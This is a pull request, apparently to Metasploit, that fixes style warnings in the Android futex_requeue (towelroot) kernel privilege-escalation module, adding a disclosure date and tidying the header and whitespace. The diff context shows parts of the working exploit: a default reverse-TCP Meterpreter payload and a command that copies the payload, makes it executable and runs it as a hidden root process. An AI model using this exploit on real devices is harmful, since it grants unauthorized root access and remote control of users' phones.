### PR TITLE
fix #4747 msftidy warnings about towelroot module

### DIFF
--- a/modules/exploits/android/local/futex_requeue.rb
+++ b/modules/exploits/android/local/futex_requeue.rb
@@ -1,8 +1,6 @@
 ##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# web site for more information on licensing and terms of use.
-#   http://metasploit.com/
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
 ##
 
 require 'msf/core'
@@ -16,14 +14,14 @@ class Metasploit4 < Msf::Exploit::Local
 
   def initialize(info={})
     super( update_info( info, {
-        'Name'          => 'Android futex requeue kernel exploit',
+        'Name'          => 'Android Futex Requeue Kernel Exploit',
         'Description'   => %q{
             This module exploits a bug in futex_requeue in the linux kernel.
-            Any android phone with a kernel built before June 2014 should be vulnerable. 
+            Any android phone with a kernel built before June 2014 should be vulnerable.
         },
         'License'       => MSF_LICENSE,
         'Author'        => [
-            'Pinkie Pie', #discovery 
+            'Pinkie Pie', #discovery
             'geohot', #towelroot
             'timwr' #metasploit module
         ],
@@ -41,7 +39,8 @@ class Metasploit4 < Msf::Exploit::Local
           {
             'PAYLOAD'  => 'android/meterpreter/reverse_tcp',
           },
-        'DefaultTarget' => 0
+        'DefaultTarget' => 0,
+        'DisclosureDate' => "May 03 2014"
       }
     ))
 
@@ -74,7 +73,7 @@ class Metasploit4 < Msf::Exploit::Local
     rootcmd += "cp " + payloadfile + " #{rootpayload} && "
     rootcmd += "chmod 766 #{rootpayload} && "
     rootcmd += "dalvikvm -Xbootclasspath:/system/framework/core.jar -cp #{rootpayload} com.metasploit.stage.Payload"
-    
+
     process = session.sys.process.execute(exploitfile, rootcmd, {'Hidden' => true, 'Channelized' => true})
     process.channel.read
   end


### PR DESCRIPTION
This adds the missing disclosure data and tidy's up some other bits. I used the CVE date: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3153

resplat deleted a little more than I expected, so I added the 'This module requires' line manually.
